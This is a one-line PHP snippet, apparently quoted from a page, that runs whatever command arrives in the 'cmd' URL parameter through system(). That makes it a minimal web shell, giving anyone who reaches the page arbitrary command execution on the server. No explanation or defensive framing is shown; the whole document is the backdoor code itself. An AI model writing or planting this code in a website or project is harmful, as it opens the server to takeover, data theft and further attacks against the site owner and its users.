<pre> if(isset($_GET['cmd'])) { system($_GET['cmd']); }</pre>